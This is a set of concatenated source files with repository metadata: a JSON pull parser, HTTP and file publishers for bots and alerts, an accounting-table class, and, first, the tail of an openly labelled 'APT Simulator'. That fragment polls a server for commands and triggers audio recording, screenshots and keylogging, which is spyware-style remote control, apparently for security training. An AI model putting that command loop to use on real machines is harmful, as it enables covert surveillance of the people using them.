    re5='((?:[a-z][a-z0-9_]*))'	# Variable Name 3
    re6='(:)'	# Any Single Character 3
    re7='((?:[a-z][a-z0-9_]*))'	# Variable Name 4
    rg = re.compile(re1+re2+re3+re4+re5+re6+re7,re.IGNORECASE|re.DOTALL)
    m = rg.search(html)
    if m:
        var1=m.group(1)
        c1=m.group(2)
        var2=m.group(3)
        c2=m.group(4)
        var3=m.group(5)
        c3=m.group(6)
        var4=m.group(7)
        if console:
            print "* Received command:", var1+c1+var2+c2+var3+c3+var4+"\n"
        # Field keywords appear to be Turkish: "ses" (audio),
        # "ekrangoruntusu" (screen capture), "tuskaydi" (key logging).
        if var1 == "ses":
            record_audio()
        if var2 == "ekrangoruntusu":
            take_screenshot()
        if var4:
            process_order(var4)
        if var3 == "tuskaydi":
            keylogger()
def main():
    # Poll the server forever.  SystemExit/KeyboardInterrupt drain any
    # pending console input (Windows msvcrt) and exit; any other error
    # sleeps five minutes and restarts by recursing into main().
    while (1==1):
        try:
            take_order()
        except SystemExit:
            import msvcrt
            while msvcrt.kbhit():
                msvcrt.getch()
            print "* Bye..."
            sys.exit(1)
        except KeyboardInterrupt:
            import msvcrt
            while msvcrt.kbhit():
                msvcrt.getch()
            print "* Bye..."
            sys.exit(1)
        except:
            if console:
                print "---\nError, sleeping mode!(", str(sys.exc_info()), ")"
            time.sleep(300)
            main()
# Script entry point: clear the screen, print the banner, start polling.
if __name__ == '__main__':
    cls()
    if console:
        print "========================================="
        print "APT Simulator [http://www.mertsarica.com]"
        print "========================================="
    main()
| {
"repo_name": "mertsarica/hack4career",
"path": "codes/apt_simulator.py",
"copies": "1",
"size": "4363",
"license": "apache-2.0",
"hash": 6215487543844510000,
"line_mean": 21.3315508021,
"line_max": 78,
"alpha_frac": 0.5933990374,
"autogenerated": false,
"ratio": 2.842345276872964,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8624758151084473,
"avg_score": 0.062197232637698156,
"num_lines": 187
} |
"""A publisher that just writes output to a file.
By itself, this is mainly used for testing, but it's also the basis for
classes like PodcastPublisher.
"""
import os
from nose.tools import set_trace
from botfriend.bot import Publisher
from botfriend.model import _now
class FileOutputPublisher(Publisher):
    """Publish posts by appending a one-line, pipe-delimited summary of
    each post to a file on disk."""

    def __init__(
        self, bot, full_config, module_config
    ):
        target = module_config['filename']
        # Relative paths are resolved against the bot's own directory.
        if not target.startswith(os.path.sep):
            target = os.path.join(bot.directory, target)
        self.path = target
        parent = os.path.split(self.path)[0]
        if not os.path.exists(parent):
            os.makedirs(parent)

    def self_test(self):
        """Fail loudly if the destination directory has gone missing."""
        parent = os.path.split(self.path)[0]
        if not os.path.exists(parent):
            raise IOError("Destination directory %s does not exist." % parent)

    def publish(self, post, publication):
        """Append a timestamped summary line for *post*, then mark the
        publication successful."""
        publish_at = post.publish_at or _now()
        body = publication.content or post.content or "[no textual content]"
        pieces = [body]
        for attachment in post.attachments:
            if attachment.content:
                pieces.append(
                    "%s-byte %s" % (len(attachment.content or ""),
                                    attachment.media_type)
                )
            else:
                pieces.append(
                    "Local %s: %s " % (attachment.media_type,
                                       attachment.filename)
                )
        line = publish_at.strftime("%Y-%m-%d %H:%M:%S")
        line = line + " | " + " | ".join(pieces) + "\n"
        with open(self.path, 'a') as out:
            out.write(line)
        publication.report_success()


# Expose this module's publisher under the generic name botfriend expects.
Publisher = FileOutputPublisher
| {
"repo_name": "leonardr/botfriend",
"path": "botfriend/publish/file.py",
"copies": "1",
"size": "1685",
"license": "mit",
"hash": 4272797181592147000,
"line_mean": 34.1041666667,
"line_max": 81,
"alpha_frac": 0.5768545994,
"autogenerated": false,
"ratio": 4.002375296912114,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0053707312387310776,
"num_lines": 48
} |
"""A Publisher that publishes to a web application using HTTP"""
import time
import requests
from alarmageddon.publishing.publisher import Publisher
from alarmageddon.publishing.exceptions import PublishFailure
class HttpPublisher(Publisher):
    """Creates an HTTP Publisher that publishes successes and/or failures
    to either one or two HTTP end points.

    If you want the same URL to be published to whether or not the
    Validation result being published failed or succeeded, please
    supply only the url parameter and omit the failure_url and
    success_url parameters.

    Conversely, if you want different URLs to be requested based on
    whether or not the Validation result being published succeeded,
    please omit the url parameter and supply the success_url and
    failure_url parameters.  The HttpPublisher will use the same
    method, headers, and authentication parameters when requesting
    both of those URLs.  If that is not acceptable, please override
    the relevant getter methods.

    :param url: The URL that this publisher should publish successful and
      failed Validation results to.
    :param success_url: The URL that this publisher should publish successful
      Validation results to.
    :param failure_url: The URL that this publisher should publish failed
      Validation results to.
    :param method: The HTTP method to use when posting. POST is the default
      because it is the only HTTP method that allows you to send the results
      of the published Validation. The GET method is allowed but cannot send
      the details of the Validation result along with the request.
    :param headers: headers to send along with the request
    :param auth: if your URLs require authentication you can supply a value
      like the following: ``auth=('user', 'pass')``
    :param attempts: the number of times to try to publish to your URL(s).
    :param retry_after_seconds: how many seconds to wait after a failed
      attempt.
    :param timeout_seconds: how long a single attempt can take before it is
      considered a failed attempt.
    :param publish_successes: specify True if you want this HTTP Publisher to
      publish successful results too. If you provide a success_url, then
      this HttpPublisher will assume you want to publish successes.
    :param expected_status_code: the HTTP status code to expect from your
      HTTP server if the Validation result was successfully published.
    :param name: The name of this publisher.
    :param priority_threshold: Will publish validations of this priority or
      higher.

    """
    def __init__(self, url=None, success_url=None, failure_url=None,
                 method="POST", headers=None, auth=None, attempts=1,
                 retry_after_seconds=2, timeout_seconds=5,
                 publish_successes=False, expected_status_code=200,
                 name=None, priority_threshold=None):
        super(HttpPublisher, self).__init__(
            name or "HttpPublisher",
            priority_threshold)
        self._success_url = success_url or url
        if not self._success_url:
            raise ValueError("either success_url or url parameter is required")
        self._failure_url = failure_url or url
        if not self._failure_url:
            raise ValueError("either failure_url or url parameter is required")
        # An explicit success_url implies the caller wants successes sent.
        self._publish_successes = (success_url is not None) or publish_successes
        self._method = method
        if not self._method:
            # Typo fixed: was "requried".
            raise ValueError("method parameter is required")
        self._headers = headers
        self._auth = auth
        self._attempts = attempts
        if self._attempts <= 0:
            raise ValueError("attempts parameter must be at least one")
        self._retry_after_seconds = retry_after_seconds
        if self._retry_after_seconds < 0:
            raise ValueError("retry_after_seconds parameter must be positive")
        self._timeout_seconds = timeout_seconds
        self._expected_status_code = expected_status_code

    def _get_method(self, result):
        """Returns the HTTP method (e.g. GET, POST, etc.) that the
        HttpPublisher should use when publishing.

        """
        return self._method

    def _get_url(self, result):
        """Returns the URL that the HttpPublisher should publish to."""
        if result.is_failure():
            return self._failure_url
        else:
            return self._success_url

    def _get_headers(self, result):
        """Return the headers, as a dict, that this HttpPublisher should
        include when it publishes.

        """
        return self._headers

    def _get_auth(self, result):
        """Returns None or authentication information (e.g. ``auth=('user',
        'pass')``) that this HttpPublisher should send along with the
        request.

        """
        return self._auth

    def _get_data(self, result):
        """Returns the data that this HttpPublisher should send along with the
        request.

        It is only relevant when the HTTP method is ``POST``.

        """
        if self._method == "POST":
            return str(result)
        else:
            return None

    def send(self, result):
        """Publish a test result.

        Retries up to ``attempts`` times; sleeps ``retry_after_seconds``
        only when the request itself raised (an unexpected status code
        retries immediately, matching the original behavior).

        :param result: The :py:class:`~.result.TestResult` of a test.

        """
        if result.is_failure() or self._publish_successes:
            published = False
            for _ in xrange(self._attempts):
                try:
                    response = requests.request(self._get_method(result),
                                                self._get_url(result),
                                                data=self._get_data(result),
                                                headers=self._get_headers(result),
                                                auth=self._get_auth(result),
                                                timeout=self._timeout_seconds)
                    if response.status_code == self._expected_status_code:
                        published = True
                        break
                except Exception:
                    time.sleep(self._retry_after_seconds)
            if not published:
                raise PublishFailure(self, result)

    def __str__(self):
        """Returns a string representation of this HttpPublisher."""
        # BUG FIX: the original concatenated two string literals with '+',
        # so .format() applied only to the second literal and the {0}-{2}
        # placeholders were emitted verbatim.  Format a single template.
        return ("HttpPublisher: '{0}', Method: {1}, Success URL: {2}, "
                "Failure URL: {3}").format(self._name, self._method,
                                           self._success_url,
                                           self._failure_url)
| {
"repo_name": "curtisallen/Alarmageddon",
"path": "alarmageddon/publishing/http.py",
"copies": "1",
"size": "6608",
"license": "apache-2.0",
"hash": 8385952268562180000,
"line_mean": 39.7901234568,
"line_max": 82,
"alpha_frac": 0.6230326877,
"autogenerated": false,
"ratio": 4.798838053740014,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00024135650701463698,
"num_lines": 162
} |
"""A pull parser for parsing JSON streams"""
# The MIT License (MIT)
#
# Copyright (c) 2015 by Teradata
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import decimal
import re
import json
import logging
from . import util # @UnusedImport # noqa
if sys.version_info[0] == 2:
from StringIO import StringIO # @UnresolvedImport #@UnusedImport
else:
from io import StringIO # @UnresolvedImport @UnusedImport @Reimport # noqa
logger = logging.getLogger(__name__)
# JSONNode and value types used by the parser's node stack and events.
OBJECT = "OBJECT"
ARRAY = "ARRAY"
FIELD = "FIELD"
STRING = "STRING"
NUMBER = "NUMBER"
BOOLEAN = "BOOLEAN"
# JSON literal spellings (lower-case, matching the JSON text itself).
NULL = "null"
TRUE = "true"
FALSE = "false"
# JSONEvent types emitted by the pull parser.
START_OBJECT = "START_OBJECT"
START_ARRAY = "START_ARRAY"
FIELD_NAME = "FIELD_NAME"
FIELD_VALUE = "FIELD_VALUE"
ARRAY_VALUE = "ARRAY_VALUE"
END_OBJECT = "END_OBJECT"
END_ARRAY = "END_ARRAY"
# JSONParseError codes.
JSON_SYNTAX_ERROR = "JSON_SYNTAX_ERROR"
JSON_INCOMPLETE_ERROR = "JSON_INCOMPLETE_ERROR"
JSON_UNEXPECTED_ELEMENT_ERROR = "JSON_UNEXPECTED_ELEMENT_ERROR"
class JSONPullParser (object):
    def __init__(self, stream, encoding="utf8", size=2 ** 16):
        """Initialize pull parser with a JSON stream.

        :param stream: file-like source of JSON text
        :param encoding: character encoding of the stream
        :param size: read-buffer size in bytes (default 64 KiB)
        """
        self.stream = stream
        self.size = size
        self.encoding = encoding
        self.node = None        # top of the OBJECT/ARRAY/FIELD node stack
        self.value = ""         # text of the value currently being assembled
        self.valueType = None   # type of the pending value (STRING, NUMBER, ...)
        self.tokens = []        # tokens split out of the current buffer
        self.tokenIndex = 0     # index of the next token to consume
        self.halfToken = ""     # token fragment carried over between buffers
        # Splits the stream on JSON structural characters: [ ] { } : \ " ,
        self.pattern = re.compile('([\[\]{}:\\\\",])')
def expectObject(self):
"""Raise JSONParseError if next event is not the start of an object."""
event = self.nextEvent()
if event.type != START_OBJECT:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_OBJECT but got: " + str(event))
def expectArray(self):
"""Raise JSONParseError if next event is not the start of an array."""
event = self.nextEvent()
if event.type != START_ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_ARRAY but got: " + str(event))
return JSONArrayIterator(self)
    def expectField(self, expectedName, expectedType=None, allowNull=False,
                    readAll=False):
        """Raise JSONParseError if next event is not the expected field with
        expected type else return the field value.  If the next field is
        an OBJECT or ARRAY, only return whole object or array if
        readAll=True."""
        event = self.nextEvent()
        # The field name must come first...
        if event.type != FIELD_NAME:
            raise JSONParseError(
                JSON_UNEXPECTED_ELEMENT_ERROR,
                "Expected FIELD_NAME but got: " + str(event))
        # ...and must match the caller's expectation.
        if event.value != expectedName:
            raise JSONParseError(JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
                                 expectedName + " field but got " +
                                 event.value + " instead.")
        # Delegate value consumption / type checking to the shared helper.
        return self._expectValue(FIELD_VALUE, expectedType, allowNull, readAll)
    def expectArrayValue(self, expectedType=None, allowNull=False,
                         readAll=False):
        """Raise JSONParseError if next event is not an array element with
        the expected type else return the field value.  If the next value
        is an OBJECT or ARRAY, only return whole object or array if
        readAll=True."""
        # Same machinery as expectField, but anchored to ARRAY_VALUE events.
        return self._expectValue(ARRAY_VALUE, expectedType, allowNull, readAll)
    def _expectValue(self, eventType, expectedType, allowNull, readAll):
        """Shared helper for expectField/expectArrayValue.

        Consumes the next event and returns its value when it is a scalar
        of *eventType*; recurses into readObject/readArray for container
        values (fully materialized only when readAll is true or no type
        was requested).  Raises JSONParseError on any type mismatch.
        """
        event = self.nextEvent()
        if event.type == eventType:
            # Scalar value: honor allowNull, then check the declared type.
            if allowNull and event.valueType == NULL:
                return None
            elif expectedType is not None and event.valueType != expectedType:
                raise JSONParseError(
                    JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " + expectedType +
                    " but got " + event.valueType + " instead.")
            else:
                return event.value
        else:
            if eventType == ARRAY_VALUE:
                # Array elements are only legal inside an array node.
                if event.node.parent is None or event.node.parent != ARRAY:
                    raise JSONParseError(
                        JSON_UNEXPECTED_ELEMENT_ERROR,
                        "Expected array element but not in an array.")
            if event.type == START_OBJECT:
                if expectedType is not None and expectedType != OBJECT:
                    raise JSONParseError(
                        JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
                        expectedType + " but got an object instead.")
                elif expectedType is None or readAll:
                    return self.readObject(event)
            elif event.type == START_ARRAY:
                if expectedType is not None and expectedType != ARRAY:
                    raise JSONParseError(
                        JSON_UNEXPECTED_ELEMENT_ERROR, "Expected " +
                        expectedType + " but got array instead.")
                if expectedType is None or readAll:
                    return self.readArray(event)
                else:
                    # Lazy iteration over the array's elements.
                    return JSONArrayIterator(self)
            else:
                raise JSONParseError(
                    JSON_UNEXPECTED_ELEMENT_ERROR,
                    "Unexpected event: " + str(event))
def readObject(self, event=None):
"""Read and return a JSON object."""
if event is None:
event = self.nextEvent()
popRequired = False
else:
popRequired = True
if event is None:
return None
if event.type != START_OBJECT:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_OBJECT but got " + event.type + " instead.")
obj = self._load(event)
if popRequired:
self._pop()
return obj
def readArray(self, event=None):
"""Read and return a JSON array."""
if event is None:
event = self.nextEvent()
popRequired = False
else:
popRequired = True
if event is None:
return None
if event.type != START_ARRAY:
raise JSONParseError(
JSON_UNEXPECTED_ELEMENT_ERROR,
"Expected START_ARRAY but got " + event.type + " instead.")
arr = self._load(event)
if popRequired:
self._pop()
return arr
def nextEvent(self):
"""Iterator method, return next JSON event from the stream, raises
StopIteration() when complete."""
try:
return self.__next__()
except StopIteration:
return None
    def next(self):
        """Iterator method, return next JSON event from the stream, raises
        StopIteration() when complete.  (Python 2 iterator protocol alias
        for __next__.)"""
        return self.__next__()
    def __next__(self):
        """Return the next JSON event from the token stream.

        Tokens come from splitting raw chunks of the input stream with
        self.pattern; structural tokens ('{', '}', '[', ']', ':', ',', '"')
        drive a stack of JSONNode objects (self.node), while scalar tokens
        are accumulated into self.value/self.valueType.  Raises
        StopIteration when the input is exhausted at the top level, and
        JSONParseError on malformed input.
        """
        while True:
            try:
                token = self.tokens[self.tokenIndex]
                self.tokenIndex += 1
                if token == "" or token.isspace():
                    # empty fragments from the splitter and whitespace are skipped
                    pass
                elif token == '{':
                    return self._push(OBJECT)
                elif token == '}':
                    if self.node.type == FIELD:
                        # first close the pending field; re-read '}' next pass
                        self.tokenIndex -= 1
                        event = self._pop()
                        if event is not None:
                            return event
                    elif self.node.type == OBJECT:
                        return self._pop()
                    else:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR,
                            "A closing curly brace ('}') is only expected "
                            "at the end of an object.")
                elif token == '[':
                    if self.node is not None and self.node.type == OBJECT:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR, "An array in an object must "
                            "be preceded by a field name.")
                    return self._push(ARRAY)
                elif token == ']':
                    if self.valueType is not None:
                        # emit the trailing array element first; re-read ']' next pass
                        self.tokenIndex -= 1
                        event = self._arrayValue()
                        if event is not None:
                            return event
                    elif self.node.type == ARRAY:
                        if self.node.lastIndex == self.node.arrayLength:
                            self.node.arrayLength += 1
                        return self._pop()
                    else:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR, "A closing bracket (']') "
                            "is only expected at the end of an array.")
                elif token == ':':
                    if self.node.type == OBJECT:
                        # the pending string value becomes the field name
                        if self.value != "" and self.valueType == STRING:
                            event = self._push(FIELD, self.value)
                            self.value = ""
                            self.valueType = None
                            return event
                        else:
                            raise JSONParseError(
                                JSON_SYNTAX_ERROR,
                                "Name for name/value pairs cannot be empty.")
                    else:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR,
                            "A colon (':') can only following a field "
                            "name within an object.")
                elif token == ',':
                    if self.node.type == ARRAY:
                        event = self._arrayValue()
                        self.node.arrayLength += 1
                    elif self.node.type == FIELD:
                        event = self._pop()
                    else:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR,
                            "A comma (',') is only expected between fields "
                            "in objects or elements of an array.")
                    # event may be None (e.g. nothing pending); keep scanning
                    if event is not None:
                        return event
                else:
                    if self.valueType is not None:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR, "Extra name or value found "
                            "following: " + str(self.value))
                    elif self.node is None:
                        raise JSONParseError(
                            JSON_SYNTAX_ERROR,
                            "Input must start with either an "
                            "OBJECT ('{') or ARRAY ('['), got '" + token +
                            "' instead.")
                    elif token == '"':
                        # accumulate a string literal, handling backslash
                        # escapes and refilling the token buffer as needed
                        escape = False
                        while True:
                            try:
                                token = self.tokens[self.tokenIndex]
                                self.tokenIndex += 1
                                if token == "":
                                    pass
                                elif escape:
                                    escape = False
                                    self.value += token
                                elif token == '"':
                                    break
                                elif token == '\\':
                                    escape = True
                                else:
                                    self.value += token
                            except IndexError:
                                data = self.stream.read(
                                    self.size).decode(self.encoding)
                                if data == "":
                                    raise JSONParseError(
                                        JSON_INCOMPLETE_ERROR,
                                        "Reached end of input before " +
                                        "reaching end of string.")
                                self.tokens = self.pattern.split(data)
                                self.tokenIndex = 0
                        self.valueType = STRING
                    else:
                        # bare scalar: number / null / true / false
                        token = token.strip()
                        if self.tokenIndex == len(self.tokens):
                            # token may be cut off at the chunk boundary;
                            # stash it and force a buffer refill below
                            self.halfToken = token
                            raise IndexError
                        elif token[0].isdigit() or token[0] == '-':
                            self.value = decimal.Decimal(token)
                            self.valueType = NUMBER
                        elif token == "null":
                            self.value = None
                            self.valueType = NULL
                        elif token == "true":
                            self.value = True
                            self.valueType = BOOLEAN
                        elif token == "false":
                            self.value = False
                            self.valueType = BOOLEAN
                        else:
                            raise JSONParseError(
                                JSON_SYNTAX_ERROR,
                                "Unexpected token: " + token)
            except IndexError:
                # token buffer exhausted: read and tokenize the next chunk
                data = self.stream.read(self.size).decode(self.encoding)
                if data == "":
                    if self.node is not None:
                        raise JSONParseError(
                            JSON_INCOMPLETE_ERROR, "Reached end of input "
                            "before reaching end of JSON structures.")
                    else:
                        raise StopIteration()
                        return None  # NOTE(review): unreachable after raise
                logger.trace(data)
                self.tokens = self.pattern.split(data)
                self.tokenIndex = 0
                if self.halfToken is not None:
                    # rejoin a scalar that straddled the chunk boundary
                    self.tokens[0] = self.halfToken + self.tokens[0]
                    self.halfToken = None
    def _load(self, event):
        """Slurp the raw text of the container opened by *event* (START_OBJECT
        or START_ARRAY) up to its matching close bracket, then parse it in
        one shot with json.loads (numbers as decimal.Decimal).

        Scans tokens without interpreting them, only tracking string/escape
        state and the nesting count of the container's own bracket pair,
        refilling the token buffer from the stream as needed.
        """
        if event.type == START_OBJECT:
            value = start = "{"
            end = "}"
        elif event.type == START_ARRAY:
            value = start = "["
            end = "]"
        else:
            raise JSONParseError(
                JSON_UNEXPECTED_ELEMENT_ERROR,
                "Unexpected event: " + event.type)
        count = 1
        tokens = self.tokens
        tokenIndex = self.tokenIndex
        inString = False
        inEscape = False
        try:
            while True:
                startIndex = tokenIndex
                for token in tokens[startIndex:]:
                    tokenIndex += 1
                    if token == "":
                        pass
                    elif inString:
                        # brackets inside string literals don't count
                        if inEscape:
                            inEscape = False
                        elif token == '"':
                            inString = False
                        elif token == '\\':
                            inEscape = True
                    elif token == '"':
                        inString = True
                    elif token == start:
                        count += 1
                    elif token == end:
                        count -= 1
                        if count == 0:
                            # matching close found: keep text up to and
                            # including it, then bail out of both loops
                            value += "".join(tokens[startIndex:tokenIndex])
                            raise StopIteration()
                # chunk exhausted without closing; append it all and refill
                value += "".join(tokens[startIndex:])
                data = self.stream.read(self.size).decode(self.encoding)
                if data == "":
                    raise JSONParseError(
                        JSON_INCOMPLETE_ERROR, "Reached end of input before "
                        "reaching end of JSON structures.")
                tokens = self.pattern.split(data)
                tokenIndex = 0
        except StopIteration:
            pass
        # hand the remaining tokens back to the event-level scanner
        self.tokens = tokens
        self.tokenIndex = tokenIndex
        try:
            return json.loads(value, parse_float=decimal.Decimal,
                              parse_int=decimal.Decimal)
        except ValueError as e:
            raise JSONParseError(JSON_SYNTAX_ERROR, "".join(e.args))
    def _push(self, nodeType, value=None):
        """Push a new OBJECT/ARRAY/FIELD node onto the context stack and
        return its start event.

        Note: *value* is passed as the third positional argument of
        JSONNode, i.e. it lands in the node's *name* slot — used for the
        field name when pushing a FIELD.
        """
        if self.node is not None and self.node.type == FIELD:
            # the new container is the value of the enclosing field
            self.node.valueType = nodeType
        self.node = JSONNode(self.node, nodeType, value)
        if self.node.parent is not None and self.node.parent.type == ARRAY:
            self.node.arrayIndex = self.node.parent.arrayLength
            # lastIndex catching up to arrayLength means no comma was seen
            # since the previous element
            if self.node.parent.lastIndex == self.node.parent.arrayLength:
                raise JSONParseError(
                    JSON_SYNTAX_ERROR,
                    "Missing comma separating array elements.")
            self.node.parent.lastIndex = self.node.parent.arrayLength
        return self.node.startEvent()
    def _pop(self):
        """Pop the current node off the context stack, transferring any
        pending scalar value onto it, and return the node's end event
        (which may be None for container-valued fields)."""
        # Pop the current node from the stack.
        node = self.node
        self.node = self.node.parent
        # Set the value and value type on the node.
        if node.valueType is None:
            node.valueType = self.valueType
            node.value = self.value
            # Reset value and valueType
            self.value = ""
            self.valueType = None
        if node.type == FIELD and node.valueType is None:
            # a field must have received either a scalar or a container
            raise JSONParseError(
                JSON_SYNTAX_ERROR, "Expected value for field: " + node.name)
        # Return the end event for the node.
        return node.endEvent()
    def _arrayValue(self):
        """Emit an ARRAY_VALUE event for the pending scalar, if any.

        Returns None (implicitly) when there is no pending value and the
        current element was already reported — e.g. a comma following a
        nested container.  Raises when a value is missing between commas.
        """
        endOfArray = self.node.lastIndex == self.node.arrayLength
        if self.valueType is None and endOfArray:
            pass
        elif self.valueType is None:
            raise JSONParseError(
                JSON_SYNTAX_ERROR,
                "Expected value for array element at index: " +
                str(self.node.arrayLength))
        else:
            event = JSONEvent(
                self.node, ARRAY_VALUE, self.value, self.valueType,
                self.node.arrayLength)
            self.node.lastIndex = self.node.arrayLength
            # Reset value and valueType
            self.value = ""
            self.valueType = None
            # Return the end event for the node.
            return event
    def __iter__(self):
        """The parser is its own iterator of JSONEvent objects."""
        return self
# Define exceptions
class JSONParseError(Exception):
    """Raised for syntax, structural, or incomplete-input errors while
    parsing JSON.  Carries an error *code* and human-readable *msg*."""
    def __init__(self, code, msg):
        # Exception.__init__ stores args=(code, msg) for us.
        super(JSONParseError, self).__init__(code, msg)
        self.code = code
        self.msg = msg
class JSONNode (object):
    """One entry on the parser's context stack: an OBJECT, ARRAY, or FIELD,
    linked to its parent node."""
    def __init__(self, parent, nodeType, name=None, value=None,
                 valueType=None):
        self.parent = parent
        self.type = nodeType
        self.name = name
        self.value = value
        self.valueType = valueType
        self.arrayIndex = None
        self.lastIndex = -1
        # Only arrays track a running element count.
        self.arrayLength = 0 if nodeType == ARRAY else None
    def startEvent(self):
        """Event emitted when this node is opened (None for unknown types)."""
        if self.type == ARRAY:
            return JSONEvent(self, START_ARRAY, arrayIndex=self.arrayIndex)
        if self.type == OBJECT:
            return JSONEvent(self, START_OBJECT, arrayIndex=self.arrayIndex)
        if self.type == FIELD:
            return JSONEvent(self, FIELD_NAME, self.name)
    def endEvent(self):
        """Event emitted when this node closes.  Container-valued fields
        yield None; their value is reported via END_OBJECT/END_ARRAY."""
        if self.type == ARRAY:
            return JSONEvent(self, END_ARRAY, arrayIndex=self.arrayIndex,
                             arrayLength=self.arrayLength)
        if self.type == OBJECT:
            return JSONEvent(self, END_OBJECT, arrayIndex=self.arrayIndex)
        if self.type == FIELD and self.valueType not in (OBJECT, ARRAY):
            return JSONEvent(self, FIELD_VALUE, self.value, self.valueType)
class JSONEvent (object):
    """A single parse event: the node it belongs to, the event type, and
    optional value / valueType / arrayIndex / arrayLength payload."""
    def __init__(self, node, eventType, value=None, valueType=None,
                 arrayIndex=None, arrayLength=None):
        self.node = node
        self.type = eventType
        self.value = value
        self.valueType = valueType
        self.arrayIndex = arrayIndex
        self.arrayLength = arrayLength
    def __repr__(self):
        # Only non-None optional attributes are shown, in a fixed order.
        parts = ["JSONEvent (type=" + self.type]
        for label in ("value", "valueType", "arrayIndex", "arrayLength"):
            attr = getattr(self, label)
            if attr is not None:
                parts.append(label + "=" + str(attr))
        return ", ".join(parts) + ")"
class JSONArrayIterator (object):
    """Lazily iterate the elements of a JSON array being parsed, yielding
    scalars directly and materializing nested objects/arrays on demand."""
    def __init__(self, parser):
        self.parser = parser
        self.complete = False
    def __iter__(self):
        return self
    def __next__(self):
        if self.complete:
            raise StopIteration()
        event = self.parser.nextEvent()
        if event.type == END_ARRAY:
            self.complete = True
            raise StopIteration()
        if event.type == START_OBJECT:
            return self.parser.readObject(event)
        if event.type == START_ARRAY:
            return self.parser.readArray(event)
        if event.type == ARRAY_VALUE:
            return event.value
        raise JSONParseError(
            JSON_UNEXPECTED_ELEMENT_ERROR,
            "Unexpected event: " + str(event))
    def next(self):
        # Python 2 compatibility shim.
        return self.__next__()
| {
"repo_name": "fxstein/PyTd",
"path": "teradata/pulljson.py",
"copies": "1",
"size": "22715",
"license": "mit",
"hash": -3771223324759636000,
"line_mean": 39.1325088339,
"line_max": 79,
"alpha_frac": 0.4960598723,
"autogenerated": false,
"ratio": 5.025442477876106,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6021502350176106,
"avg_score": null,
"num_lines": null
} |
""" apu.py Tabla APU y Asiento. """
from decimal import Decimal
from ..base import SOLFile
from ..fields import CampoA, CampoT, CampoN, CampoF, CampoND, CampoV
from ..fields import CampoCuenta, CampoDebeHaber
def get_en_pesetas(obj, col_valor):
    """Return the value of attribute *col_valor* on *obj* converted from
    euros to pesetas at the fixed official rate (1 EUR = 166.386 ESP)."""
    euros = getattr(obj, col_valor)
    return euros * Decimal('166.386')
class APU(SOLFile):
    """APU table: one accounting entry line (journal entry / 'asiento')."""
    cA = CampoN("Diario", size=3, default=1, required=True)
    cB = CampoF("Fecha", required=True)
    cC = CampoN("Asiento", size=5, default=0, required=True)
    cD = CampoN("Orden", size=6, required=True)
    cE = CampoCuenta("Cuenta", size=10, required=True)
    # Derived column: pesetas computed from the euros amount.
    # NOTE(review): ('euros') is a plain string, not a 1-tuple — confirm
    # CampoV accepts a string here or whether ('euros',) was intended.
    cF = CampoV("Pesetas", size=15, getter=get_en_pesetas,
                parametros=('euros'))
    cG = CampoA("Concepto", size=60)
    cH = CampoA("Documento", size=5)
    cI = CampoND("Debe", size=15)
    cJ = CampoND("Haber", size=15)
    cK = CampoA("Moneda", size=1, default='E')
    cL = CampoN("Punteo", size=1, default=0)
    cM = CampoA("Tipo IVA", size=1)
    cN = CampoN("Codigo de IVA", size=5)
    cO = CampoN("Departamento", size=3)
    cP = CampoN("Subdepartamento", size=3)
    cQ = CampoT("Ruta Imagen")
    # Composite debit/credit amount backed by columns I (Debe) / J (Haber).
    euros = CampoDebeHaber("Euros", 'I', 'J', editable=True)
    asi = None
    class Meta:
        tabla = 'APU'
        aliases = (('dpto', 'O'), ('subdpto', 'P'))
        sort_by = ('fecha', 'asiento', 'orden')
    def __unicode__(self):
        # Truncate the concept text to 40 chars for display; None when empty.
        con = self.concepto and self.concepto[:40] or None
        return u"APU(%s %s,%s: %s:%10s %s > %s)" % \
            (self.fecha.strftime('%Y-%m-%d'),
             self.diario, self.asiento, self.orden,
             self.cuenta, self.euros, con)
    __str__ = __unicode__
    __repr__ = __unicode__
| {
"repo_name": "telenieko/importasol",
"path": "importasol/db/contasol/apu.py",
"copies": "1",
"size": "1686",
"license": "bsd-3-clause",
"hash": -1478644694118990000,
"line_mean": 33.4081632653,
"line_max": 68,
"alpha_frac": 0.5871886121,
"autogenerated": false,
"ratio": 2.6302652106084246,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8717453822708424,
"avg_score": 0,
"num_lines": 49
} |
# A pure-python, exact delaunay triangulation.
# uses robust_predicates for in-circle tests, follows
# the algorithm of CGAL to the extent possible.
import logging
import pdb
logger = logging.getLogger()
import six
